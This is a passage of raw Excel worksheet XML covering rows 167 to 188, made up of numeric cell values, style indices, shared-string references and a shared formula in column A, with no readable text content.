      </c>
      <c r="AE167" s="8"/>
      <c r="AF167" s="15"/>
    </row>
    <row r="168">
      <c r="A168" s="6">
        <f t="shared" si="1"/>
        <v>0.7943735666</v>
      </c>
      <c r="B168" s="6">
        <v>1.9514828E7</v>
      </c>
      <c r="C168" s="6">
        <v>1.0</v>
      </c>
      <c r="D168" s="8"/>
      <c r="E168" s="8"/>
      <c r="F168" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G168" s="8"/>
      <c r="H168" s="6">
        <v>0.0</v>
      </c>
      <c r="I168" s="6">
        <v>1303.0</v>
      </c>
      <c r="J168" s="17"/>
      <c r="K168" s="17"/>
      <c r="L168" s="17"/>
      <c r="M168" s="17"/>
      <c r="N168" s="17"/>
      <c r="O168" s="4" t="s">
        <v>589</v>
      </c>
      <c r="P168" s="4" t="s">
        <v>590</v>
      </c>
      <c r="Q168" s="6">
        <v>1161642.0</v>
      </c>
      <c r="R168" s="7"/>
      <c r="S168" s="7"/>
      <c r="T168" s="7"/>
      <c r="U168" s="8"/>
      <c r="V168" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W168" s="2" t="s">
        <v>591</v>
      </c>
      <c r="X168" s="6">
        <v>2.0</v>
      </c>
      <c r="Y168" s="6">
        <v>0.0</v>
      </c>
      <c r="Z168" s="7"/>
      <c r="AA168" s="7"/>
      <c r="AB168" s="7"/>
      <c r="AC168" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE168" s="8"/>
      <c r="AF168" s="15"/>
    </row>
    <row r="169">
      <c r="A169" s="6">
        <f t="shared" si="1"/>
        <v>0.4603266756</v>
      </c>
      <c r="B169" s="6">
        <v>7.6386065E7</v>
      </c>
      <c r="C169" s="6">
        <v>1.0</v>
      </c>
      <c r="D169" s="8"/>
      <c r="E169" s="8"/>
      <c r="F169" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G169" s="8"/>
      <c r="H169" s="6">
        <v>0.0</v>
      </c>
      <c r="I169" s="6">
        <v>21.0</v>
      </c>
      <c r="J169" s="20"/>
      <c r="K169" s="20"/>
      <c r="L169" s="20"/>
      <c r="M169" s="20"/>
      <c r="N169" s="20"/>
      <c r="O169" s="4" t="s">
        <v>592</v>
      </c>
      <c r="P169" s="4" t="s">
        <v>593</v>
      </c>
      <c r="Q169" s="6">
        <v>5840397.0</v>
      </c>
      <c r="R169" s="8"/>
      <c r="S169" s="8"/>
      <c r="T169" s="8"/>
      <c r="U169" s="8"/>
      <c r="V169" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W169" s="2" t="s">
        <v>594</v>
      </c>
      <c r="X169" s="6">
        <v>0.0</v>
      </c>
      <c r="Y169" s="6">
        <v>1.0</v>
      </c>
      <c r="Z169" s="8"/>
      <c r="AA169" s="8"/>
      <c r="AB169" s="8"/>
      <c r="AC169" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE169" s="8"/>
      <c r="AF169" s="14"/>
    </row>
    <row r="170">
      <c r="A170" s="6">
        <f t="shared" si="1"/>
        <v>0.5161939558</v>
      </c>
      <c r="B170" s="6">
        <v>2.0664948E7</v>
      </c>
      <c r="C170" s="6">
        <v>1.0</v>
      </c>
      <c r="D170" s="6">
        <v>2.0667498E7</v>
      </c>
      <c r="E170" s="8"/>
      <c r="F170" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G170" s="8"/>
      <c r="H170" s="6">
        <v>0.0</v>
      </c>
      <c r="I170" s="6">
        <v>113.0</v>
      </c>
      <c r="J170" s="17"/>
      <c r="K170" s="17"/>
      <c r="L170" s="17"/>
      <c r="M170" s="17"/>
      <c r="N170" s="17"/>
      <c r="O170" s="4" t="s">
        <v>595</v>
      </c>
      <c r="P170" s="4" t="s">
        <v>596</v>
      </c>
      <c r="Q170" s="6">
        <v>1140485.0</v>
      </c>
      <c r="R170" s="7"/>
      <c r="S170" s="7"/>
      <c r="T170" s="7"/>
      <c r="U170" s="8"/>
      <c r="V170" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W170" s="2" t="s">
        <v>597</v>
      </c>
      <c r="X170" s="6">
        <v>2.0</v>
      </c>
      <c r="Y170" s="6">
        <v>1.0</v>
      </c>
      <c r="Z170" s="7"/>
      <c r="AA170" s="7"/>
      <c r="AB170" s="7"/>
      <c r="AC170" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE170" s="8"/>
      <c r="AF170" s="15"/>
    </row>
    <row r="171">
      <c r="A171" s="6">
        <f t="shared" si="1"/>
        <v>0.09082585475</v>
      </c>
      <c r="B171" s="6">
        <v>7802513.0</v>
      </c>
      <c r="C171" s="6">
        <v>1.0</v>
      </c>
      <c r="D171" s="8"/>
      <c r="E171" s="8"/>
      <c r="F171" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G171" s="8"/>
      <c r="H171" s="6">
        <v>0.0</v>
      </c>
      <c r="I171" s="6">
        <v>2622.0</v>
      </c>
      <c r="J171" s="20"/>
      <c r="K171" s="20"/>
      <c r="L171" s="20"/>
      <c r="M171" s="20"/>
      <c r="N171" s="20"/>
      <c r="O171" s="4" t="s">
        <v>598</v>
      </c>
      <c r="P171" s="4" t="s">
        <v>599</v>
      </c>
      <c r="Q171" s="6">
        <v>758466.0</v>
      </c>
      <c r="R171" s="8"/>
      <c r="S171" s="6">
        <v>321731.0</v>
      </c>
      <c r="T171" s="8"/>
      <c r="U171" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V171" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W171" s="2" t="s">
        <v>600</v>
      </c>
      <c r="X171" s="6">
        <v>1.0</v>
      </c>
      <c r="Y171" s="6">
        <v>0.0</v>
      </c>
      <c r="Z171" s="8"/>
      <c r="AA171" s="8"/>
      <c r="AB171" s="8"/>
      <c r="AC171" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE171" s="8"/>
      <c r="AF171" s="14"/>
    </row>
    <row r="172">
      <c r="A172" s="6">
        <f t="shared" si="1"/>
        <v>0.8176557841</v>
      </c>
      <c r="B172" s="6">
        <v>7.2881758E7</v>
      </c>
      <c r="C172" s="6">
        <v>1.0</v>
      </c>
      <c r="D172" s="8"/>
      <c r="E172" s="8"/>
      <c r="F172" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G172" s="8"/>
      <c r="H172" s="6">
        <v>1.0</v>
      </c>
      <c r="I172" s="6">
        <v>97.0</v>
      </c>
      <c r="J172" s="20"/>
      <c r="K172" s="20"/>
      <c r="L172" s="20"/>
      <c r="M172" s="20"/>
      <c r="N172" s="20"/>
      <c r="O172" s="4" t="s">
        <v>601</v>
      </c>
      <c r="P172" s="4" t="s">
        <v>602</v>
      </c>
      <c r="Q172" s="6">
        <v>1.0130186E7</v>
      </c>
      <c r="R172" s="8"/>
      <c r="S172" s="8"/>
      <c r="T172" s="8"/>
      <c r="U172" s="8"/>
      <c r="V172" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W172" s="2" t="s">
        <v>603</v>
      </c>
      <c r="X172" s="6">
        <v>0.0</v>
      </c>
      <c r="Y172" s="6">
        <v>9.0</v>
      </c>
      <c r="Z172" s="8"/>
      <c r="AA172" s="8"/>
      <c r="AB172" s="8"/>
      <c r="AC172" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE172" s="8"/>
      <c r="AF172" s="14"/>
    </row>
    <row r="173">
      <c r="A173" s="6">
        <f t="shared" si="1"/>
        <v>0.9112135376</v>
      </c>
      <c r="B173" s="6">
        <v>5.0682806E7</v>
      </c>
      <c r="C173" s="6">
        <v>1.0</v>
      </c>
      <c r="D173" s="7"/>
      <c r="E173" s="8"/>
      <c r="F173" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G173" s="8"/>
      <c r="H173" s="6">
        <v>0.0</v>
      </c>
      <c r="I173" s="6">
        <v>1385.0</v>
      </c>
      <c r="J173" s="17"/>
      <c r="K173" s="17"/>
      <c r="L173" s="17"/>
      <c r="M173" s="17"/>
      <c r="N173" s="17"/>
      <c r="O173" s="4" t="s">
        <v>604</v>
      </c>
      <c r="P173" s="4" t="s">
        <v>605</v>
      </c>
      <c r="Q173" s="6">
        <v>9892645.0</v>
      </c>
      <c r="R173" s="7"/>
      <c r="S173" s="7"/>
      <c r="T173" s="7"/>
      <c r="U173" s="8"/>
      <c r="V173" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W173" s="2" t="s">
        <v>606</v>
      </c>
      <c r="X173" s="6">
        <v>1.0</v>
      </c>
      <c r="Y173" s="6">
        <v>0.0</v>
      </c>
      <c r="Z173" s="7"/>
      <c r="AA173" s="7"/>
      <c r="AB173" s="7"/>
      <c r="AC173" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE173" s="8"/>
      <c r="AF173" s="15"/>
    </row>
    <row r="174">
      <c r="A174" s="6">
        <f t="shared" si="1"/>
        <v>0.2995756281</v>
      </c>
      <c r="B174" s="6">
        <v>5080167.0</v>
      </c>
      <c r="C174" s="6">
        <v>1.0</v>
      </c>
      <c r="D174" s="8"/>
      <c r="E174" s="8"/>
      <c r="F174" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G174" s="8"/>
      <c r="H174" s="6">
        <v>4.0</v>
      </c>
      <c r="I174" s="6">
        <v>390.0</v>
      </c>
      <c r="J174" s="20"/>
      <c r="K174" s="20"/>
      <c r="L174" s="20"/>
      <c r="M174" s="20"/>
      <c r="N174" s="20"/>
      <c r="O174" s="4" t="s">
        <v>607</v>
      </c>
      <c r="P174" s="4" t="s">
        <v>608</v>
      </c>
      <c r="Q174" s="8"/>
      <c r="R174" s="2" t="s">
        <v>609</v>
      </c>
      <c r="S174" s="8"/>
      <c r="T174" s="8"/>
      <c r="U174" s="8"/>
      <c r="V174" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W174" s="2" t="s">
        <v>610</v>
      </c>
      <c r="X174" s="6">
        <v>1.0</v>
      </c>
      <c r="Y174" s="6">
        <v>0.0</v>
      </c>
      <c r="Z174" s="8"/>
      <c r="AA174" s="8"/>
      <c r="AB174" s="8"/>
      <c r="AC174" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE174" s="8"/>
      <c r="AF174" s="14"/>
    </row>
    <row r="175">
      <c r="A175" s="6">
        <f t="shared" si="1"/>
        <v>0.7245540272</v>
      </c>
      <c r="B175" s="6">
        <v>1.8947207E7</v>
      </c>
      <c r="C175" s="6">
        <v>1.0</v>
      </c>
      <c r="D175" s="8"/>
      <c r="E175" s="8"/>
      <c r="F175" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G175" s="8"/>
      <c r="H175" s="6">
        <v>0.0</v>
      </c>
      <c r="I175" s="6">
        <v>5079.0</v>
      </c>
      <c r="J175" s="20"/>
      <c r="K175" s="20"/>
      <c r="L175" s="20"/>
      <c r="M175" s="20"/>
      <c r="N175" s="20"/>
      <c r="O175" s="4" t="s">
        <v>611</v>
      </c>
      <c r="P175" s="4" t="s">
        <v>612</v>
      </c>
      <c r="Q175" s="8"/>
      <c r="R175" s="2" t="s">
        <v>613</v>
      </c>
      <c r="S175" s="8"/>
      <c r="T175" s="8"/>
      <c r="U175" s="8"/>
      <c r="V175" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W175" s="2" t="s">
        <v>614</v>
      </c>
      <c r="X175" s="6">
        <v>1.0</v>
      </c>
      <c r="Y175" s="6">
        <v>3.0</v>
      </c>
      <c r="Z175" s="8"/>
      <c r="AA175" s="8"/>
      <c r="AB175" s="8"/>
      <c r="AC175" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE175" s="8"/>
      <c r="AF175" s="14"/>
    </row>
    <row r="176">
      <c r="A176" s="6">
        <f t="shared" si="1"/>
        <v>0.6941255725</v>
      </c>
      <c r="B176" s="6">
        <v>1.172682E7</v>
      </c>
      <c r="C176" s="6">
        <v>1.0</v>
      </c>
      <c r="D176" s="6">
        <v>1.1727264E7</v>
      </c>
      <c r="E176" s="8"/>
      <c r="F176" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G176" s="8"/>
      <c r="H176" s="6">
        <v>8.0</v>
      </c>
      <c r="I176" s="6">
        <v>9953.0</v>
      </c>
      <c r="J176" s="20"/>
      <c r="K176" s="20"/>
      <c r="L176" s="20"/>
      <c r="M176" s="20"/>
      <c r="N176" s="20"/>
      <c r="O176" s="4" t="s">
        <v>615</v>
      </c>
      <c r="P176" s="4" t="s">
        <v>616</v>
      </c>
      <c r="Q176" s="6">
        <v>1316524.0</v>
      </c>
      <c r="R176" s="8"/>
      <c r="S176" s="6">
        <v>759866.0</v>
      </c>
      <c r="T176" s="8"/>
      <c r="U176" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V176" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W176" s="2" t="s">
        <v>617</v>
      </c>
      <c r="X176" s="6">
        <v>2.0</v>
      </c>
      <c r="Y176" s="6">
        <v>7.0</v>
      </c>
      <c r="Z176" s="6">
        <v>0.0</v>
      </c>
      <c r="AA176" s="8"/>
      <c r="AB176" s="8"/>
      <c r="AC176" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE176" s="8"/>
      <c r="AF176" s="14"/>
    </row>
    <row r="177">
      <c r="A177" s="6">
        <f t="shared" si="1"/>
        <v>0.5137534941</v>
      </c>
      <c r="B177" s="6">
        <v>4.2155087E7</v>
      </c>
      <c r="C177" s="6">
        <v>1.0</v>
      </c>
      <c r="D177" s="7"/>
      <c r="E177" s="8"/>
      <c r="F177" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G177" s="8"/>
      <c r="H177" s="6">
        <v>2.0</v>
      </c>
      <c r="I177" s="6">
        <v>98.0</v>
      </c>
      <c r="J177" s="17"/>
      <c r="K177" s="17"/>
      <c r="L177" s="17"/>
      <c r="M177" s="17"/>
      <c r="N177" s="17"/>
      <c r="O177" s="4" t="s">
        <v>618</v>
      </c>
      <c r="P177" s="4" t="s">
        <v>619</v>
      </c>
      <c r="Q177" s="6">
        <v>1052744.0</v>
      </c>
      <c r="R177" s="7"/>
      <c r="S177" s="6">
        <v>1052744.0</v>
      </c>
      <c r="T177" s="7"/>
      <c r="U177" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V177" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W177" s="2" t="s">
        <v>620</v>
      </c>
      <c r="X177" s="6">
        <v>0.0</v>
      </c>
      <c r="Y177" s="6">
        <v>3.0</v>
      </c>
      <c r="Z177" s="7"/>
      <c r="AA177" s="7"/>
      <c r="AB177" s="7"/>
      <c r="AC177" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE177" s="8"/>
      <c r="AF177" s="15"/>
    </row>
    <row r="178">
      <c r="A178" s="6">
        <f t="shared" si="1"/>
        <v>0.2925892307</v>
      </c>
      <c r="B178" s="6">
        <v>5.7795232E7</v>
      </c>
      <c r="C178" s="6">
        <v>1.0</v>
      </c>
      <c r="D178" s="7"/>
      <c r="E178" s="8"/>
      <c r="F178" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G178" s="8"/>
      <c r="H178" s="6">
        <v>4.0</v>
      </c>
      <c r="I178" s="6">
        <v>949.0</v>
      </c>
      <c r="J178" s="17"/>
      <c r="K178" s="17"/>
      <c r="L178" s="17"/>
      <c r="M178" s="17"/>
      <c r="N178" s="17"/>
      <c r="O178" s="4" t="s">
        <v>621</v>
      </c>
      <c r="P178" s="4" t="s">
        <v>622</v>
      </c>
      <c r="Q178" s="6">
        <v>1.1423925E7</v>
      </c>
      <c r="R178" s="7"/>
      <c r="S178" s="6">
        <v>1.1423925E7</v>
      </c>
      <c r="T178" s="7"/>
      <c r="U178" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V178" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W178" s="2" t="s">
        <v>623</v>
      </c>
      <c r="X178" s="6">
        <v>1.0</v>
      </c>
      <c r="Y178" s="6">
        <v>2.0</v>
      </c>
      <c r="Z178" s="7"/>
      <c r="AA178" s="7"/>
      <c r="AB178" s="7"/>
      <c r="AC178" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE178" s="8"/>
      <c r="AF178" s="15"/>
    </row>
    <row r="179">
      <c r="A179" s="6">
        <f t="shared" si="1"/>
        <v>0.19879978</v>
      </c>
      <c r="B179" s="6">
        <v>4.3786646E7</v>
      </c>
      <c r="C179" s="6">
        <v>1.0</v>
      </c>
      <c r="D179" s="8"/>
      <c r="E179" s="8"/>
      <c r="F179" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G179" s="8"/>
      <c r="H179" s="6">
        <v>0.0</v>
      </c>
      <c r="I179" s="6">
        <v>69.0</v>
      </c>
      <c r="J179" s="17"/>
      <c r="K179" s="17"/>
      <c r="L179" s="17"/>
      <c r="M179" s="17"/>
      <c r="N179" s="17"/>
      <c r="O179" s="4" t="s">
        <v>624</v>
      </c>
      <c r="P179" s="4" t="s">
        <v>625</v>
      </c>
      <c r="Q179" s="6">
        <v>3138244.0</v>
      </c>
      <c r="R179" s="7"/>
      <c r="S179" s="6">
        <v>3138244.0</v>
      </c>
      <c r="T179" s="7"/>
      <c r="U179" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V179" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W179" s="2" t="s">
        <v>626</v>
      </c>
      <c r="X179" s="6">
        <v>1.0</v>
      </c>
      <c r="Y179" s="6">
        <v>0.0</v>
      </c>
      <c r="Z179" s="6">
        <v>0.0</v>
      </c>
      <c r="AA179" s="7"/>
      <c r="AB179" s="7"/>
      <c r="AC179" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE179" s="8"/>
      <c r="AF179" s="15"/>
    </row>
    <row r="180">
      <c r="A180" s="6">
        <f t="shared" si="1"/>
        <v>0.6361041831</v>
      </c>
      <c r="B180" s="6">
        <v>4709351.0</v>
      </c>
      <c r="C180" s="6">
        <v>1.0</v>
      </c>
      <c r="D180" s="6">
        <v>4709403.0</v>
      </c>
      <c r="E180" s="8"/>
      <c r="F180" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G180" s="8"/>
      <c r="H180" s="6">
        <v>0.0</v>
      </c>
      <c r="I180" s="6">
        <v>596.0</v>
      </c>
      <c r="J180" s="20"/>
      <c r="K180" s="20"/>
      <c r="L180" s="20"/>
      <c r="M180" s="20"/>
      <c r="N180" s="20"/>
      <c r="O180" s="4" t="s">
        <v>627</v>
      </c>
      <c r="P180" s="4" t="s">
        <v>628</v>
      </c>
      <c r="Q180" s="6">
        <v>192173.0</v>
      </c>
      <c r="R180" s="8"/>
      <c r="S180" s="8"/>
      <c r="T180" s="8"/>
      <c r="U180" s="8"/>
      <c r="V180" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W180" s="2" t="s">
        <v>629</v>
      </c>
      <c r="X180" s="6">
        <v>1.0</v>
      </c>
      <c r="Y180" s="6">
        <v>0.0</v>
      </c>
      <c r="Z180" s="8"/>
      <c r="AA180" s="8"/>
      <c r="AB180" s="8"/>
      <c r="AC180" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE180" s="8"/>
      <c r="AF180" s="14"/>
    </row>
    <row r="181">
      <c r="A181" s="6">
        <f t="shared" si="1"/>
        <v>0.3459701569</v>
      </c>
      <c r="B181" s="6">
        <v>2.0740517E7</v>
      </c>
      <c r="C181" s="6">
        <v>1.0</v>
      </c>
      <c r="D181" s="6">
        <v>2.0740606E7</v>
      </c>
      <c r="E181" s="8"/>
      <c r="F181" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G181" s="8"/>
      <c r="H181" s="6">
        <v>1.0</v>
      </c>
      <c r="I181" s="6">
        <v>109.0</v>
      </c>
      <c r="J181" s="17"/>
      <c r="K181" s="17"/>
      <c r="L181" s="17"/>
      <c r="M181" s="17"/>
      <c r="N181" s="17"/>
      <c r="O181" s="4" t="s">
        <v>630</v>
      </c>
      <c r="P181" s="4" t="s">
        <v>631</v>
      </c>
      <c r="Q181" s="6">
        <v>3128991.0</v>
      </c>
      <c r="R181" s="7"/>
      <c r="S181" s="6">
        <v>548225.0</v>
      </c>
      <c r="T181" s="7"/>
      <c r="U181" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V181" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W181" s="2" t="s">
        <v>632</v>
      </c>
      <c r="X181" s="6">
        <v>2.0</v>
      </c>
      <c r="Y181" s="6">
        <v>0.0</v>
      </c>
      <c r="Z181" s="7"/>
      <c r="AA181" s="7"/>
      <c r="AB181" s="7"/>
      <c r="AC181" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE181" s="8"/>
      <c r="AF181" s="15"/>
    </row>
    <row r="182">
      <c r="A182" s="6">
        <f t="shared" si="1"/>
        <v>0.04447546704</v>
      </c>
      <c r="B182" s="6">
        <v>4.8911692E7</v>
      </c>
      <c r="C182" s="6">
        <v>1.0</v>
      </c>
      <c r="D182" s="6">
        <v>4.8912587E7</v>
      </c>
      <c r="E182" s="8"/>
      <c r="F182" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G182" s="8"/>
      <c r="H182" s="6">
        <v>1.0</v>
      </c>
      <c r="I182" s="6">
        <v>536.0</v>
      </c>
      <c r="J182" s="20"/>
      <c r="K182" s="20"/>
      <c r="L182" s="20"/>
      <c r="M182" s="20"/>
      <c r="N182" s="20"/>
      <c r="O182" s="4" t="s">
        <v>633</v>
      </c>
      <c r="P182" s="4" t="s">
        <v>634</v>
      </c>
      <c r="Q182" s="6">
        <v>3007120.0</v>
      </c>
      <c r="R182" s="8"/>
      <c r="S182" s="8"/>
      <c r="T182" s="8"/>
      <c r="U182" s="8"/>
      <c r="V182" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W182" s="2" t="s">
        <v>635</v>
      </c>
      <c r="X182" s="6">
        <v>1.0</v>
      </c>
      <c r="Y182" s="6">
        <v>0.0</v>
      </c>
      <c r="Z182" s="6">
        <v>0.0</v>
      </c>
      <c r="AA182" s="8"/>
      <c r="AB182" s="8"/>
      <c r="AC182" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE182" s="8"/>
      <c r="AF182" s="14"/>
    </row>
    <row r="183">
      <c r="A183" s="6">
        <f t="shared" si="1"/>
        <v>0.9303311864</v>
      </c>
      <c r="B183" s="6">
        <v>7.6633577E7</v>
      </c>
      <c r="C183" s="6">
        <v>1.0</v>
      </c>
      <c r="D183" s="8"/>
      <c r="E183" s="8"/>
      <c r="F183" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G183" s="8"/>
      <c r="H183" s="6">
        <v>0.0</v>
      </c>
      <c r="I183" s="6">
        <v>27.0</v>
      </c>
      <c r="J183" s="17"/>
      <c r="K183" s="17"/>
      <c r="L183" s="17"/>
      <c r="M183" s="17"/>
      <c r="N183" s="17"/>
      <c r="O183" s="4" t="s">
        <v>636</v>
      </c>
      <c r="P183" s="4" t="s">
        <v>637</v>
      </c>
      <c r="Q183" s="6">
        <v>1.6687306E7</v>
      </c>
      <c r="R183" s="7"/>
      <c r="S183" s="7"/>
      <c r="T183" s="7"/>
      <c r="U183" s="8"/>
      <c r="V183" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W183" s="2" t="s">
        <v>638</v>
      </c>
      <c r="X183" s="6">
        <v>2.0</v>
      </c>
      <c r="Y183" s="6">
        <v>1.0</v>
      </c>
      <c r="Z183" s="7"/>
      <c r="AA183" s="7"/>
      <c r="AB183" s="7"/>
      <c r="AC183" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE183" s="8"/>
      <c r="AF183" s="15"/>
    </row>
    <row r="184">
      <c r="A184" s="6">
        <f t="shared" si="1"/>
        <v>0.5123724623</v>
      </c>
      <c r="B184" s="6">
        <v>5.9465706E7</v>
      </c>
      <c r="C184" s="6">
        <v>1.0</v>
      </c>
      <c r="D184" s="8"/>
      <c r="E184" s="8"/>
      <c r="F184" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G184" s="8"/>
      <c r="H184" s="6">
        <v>0.0</v>
      </c>
      <c r="I184" s="6">
        <v>34.0</v>
      </c>
      <c r="J184" s="20"/>
      <c r="K184" s="20"/>
      <c r="L184" s="20"/>
      <c r="M184" s="20"/>
      <c r="N184" s="20"/>
      <c r="O184" s="4" t="s">
        <v>639</v>
      </c>
      <c r="P184" s="4" t="s">
        <v>640</v>
      </c>
      <c r="Q184" s="6">
        <v>5404964.0</v>
      </c>
      <c r="R184" s="8"/>
      <c r="S184" s="6">
        <v>5404964.0</v>
      </c>
      <c r="T184" s="8"/>
      <c r="U184" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V184" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W184" s="2" t="s">
        <v>641</v>
      </c>
      <c r="X184" s="6">
        <v>1.0</v>
      </c>
      <c r="Y184" s="6">
        <v>0.0</v>
      </c>
      <c r="Z184" s="8"/>
      <c r="AA184" s="8"/>
      <c r="AB184" s="8"/>
      <c r="AC184" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE184" s="8"/>
      <c r="AF184" s="14"/>
    </row>
    <row r="185">
      <c r="A185" s="6">
        <f t="shared" si="1"/>
        <v>0.2690028024</v>
      </c>
      <c r="B185" s="6">
        <v>7917747.0</v>
      </c>
      <c r="C185" s="6">
        <v>1.0</v>
      </c>
      <c r="D185" s="8"/>
      <c r="E185" s="8"/>
      <c r="F185" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G185" s="8"/>
      <c r="H185" s="6">
        <v>11.0</v>
      </c>
      <c r="I185" s="6">
        <v>6009.0</v>
      </c>
      <c r="J185" s="20"/>
      <c r="K185" s="20"/>
      <c r="L185" s="20"/>
      <c r="M185" s="20"/>
      <c r="N185" s="20"/>
      <c r="O185" s="4" t="s">
        <v>642</v>
      </c>
      <c r="P185" s="4" t="s">
        <v>643</v>
      </c>
      <c r="Q185" s="6">
        <v>18802.0</v>
      </c>
      <c r="R185" s="8"/>
      <c r="S185" s="8"/>
      <c r="T185" s="8"/>
      <c r="U185" s="8"/>
      <c r="V185" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W185" s="2" t="s">
        <v>644</v>
      </c>
      <c r="X185" s="6">
        <v>3.0</v>
      </c>
      <c r="Y185" s="6">
        <v>1.0</v>
      </c>
      <c r="Z185" s="6">
        <v>0.0</v>
      </c>
      <c r="AA185" s="8"/>
      <c r="AB185" s="8"/>
      <c r="AC185" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE185" s="8"/>
      <c r="AF185" s="14"/>
    </row>
    <row r="186">
      <c r="A186" s="6">
        <f t="shared" si="1"/>
        <v>0.5356117706</v>
      </c>
      <c r="B186" s="6">
        <v>2.8838861E7</v>
      </c>
      <c r="C186" s="6">
        <v>1.0</v>
      </c>
      <c r="D186" s="6">
        <v>2.8841511E7</v>
      </c>
      <c r="E186" s="8"/>
      <c r="F186" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G186" s="8"/>
      <c r="H186" s="6">
        <v>4.0</v>
      </c>
      <c r="I186" s="6">
        <v>419.0</v>
      </c>
      <c r="J186" s="17"/>
      <c r="K186" s="17"/>
      <c r="L186" s="17"/>
      <c r="M186" s="17"/>
      <c r="N186" s="17"/>
      <c r="O186" s="4" t="s">
        <v>645</v>
      </c>
      <c r="P186" s="4" t="s">
        <v>646</v>
      </c>
      <c r="Q186" s="6">
        <v>3821334.0</v>
      </c>
      <c r="R186" s="7"/>
      <c r="S186" s="6">
        <v>3821334.0</v>
      </c>
      <c r="T186" s="7"/>
      <c r="U186" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V186" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W186" s="2" t="s">
        <v>647</v>
      </c>
      <c r="X186" s="6">
        <v>2.0</v>
      </c>
      <c r="Y186" s="6">
        <v>1.0</v>
      </c>
      <c r="Z186" s="6">
        <v>0.0</v>
      </c>
      <c r="AA186" s="7"/>
      <c r="AB186" s="7"/>
      <c r="AC186" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE186" s="8"/>
      <c r="AF186" s="15"/>
    </row>
    <row r="187">
      <c r="A187" s="6">
        <f t="shared" si="1"/>
        <v>0.2271285842</v>
      </c>
      <c r="B187" s="6">
        <v>5.7638279E7</v>
      </c>
      <c r="C187" s="6">
        <v>1.0</v>
      </c>
      <c r="D187" s="6">
        <v>5.7638667E7</v>
      </c>
      <c r="E187" s="8"/>
      <c r="F187" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G187" s="8"/>
      <c r="H187" s="6">
        <v>0.0</v>
      </c>
      <c r="I187" s="6">
        <v>89.0</v>
      </c>
      <c r="J187" s="17"/>
      <c r="K187" s="17"/>
      <c r="L187" s="17"/>
      <c r="M187" s="17"/>
      <c r="N187" s="17"/>
      <c r="O187" s="4" t="s">
        <v>648</v>
      </c>
      <c r="P187" s="4" t="s">
        <v>649</v>
      </c>
      <c r="Q187" s="6">
        <v>680026.0</v>
      </c>
      <c r="R187" s="7"/>
      <c r="S187" s="7"/>
      <c r="T187" s="7"/>
      <c r="U187" s="8"/>
      <c r="V187" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W187" s="2" t="s">
        <v>650</v>
      </c>
      <c r="X187" s="6">
        <v>1.0</v>
      </c>
      <c r="Y187" s="6">
        <v>0.0</v>
      </c>
      <c r="Z187" s="7"/>
      <c r="AA187" s="7"/>
      <c r="AB187" s="7"/>
      <c r="AC187" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE187" s="8"/>
      <c r="AF187" s="15"/>
    </row>
    <row r="188">
      <c r="A188" s="6">
        <f t="shared" si="1"/>
        <v>0.04375771554</v>
      </c>
      <c r="B188" s="6">
        <v>6.3395685E7</v>
      </c>
      <c r="C188" s="6">
        <v>1.0</v>
      </c>
      <c r="D188" s="8"/>
      <c r="E188" s="8"/>
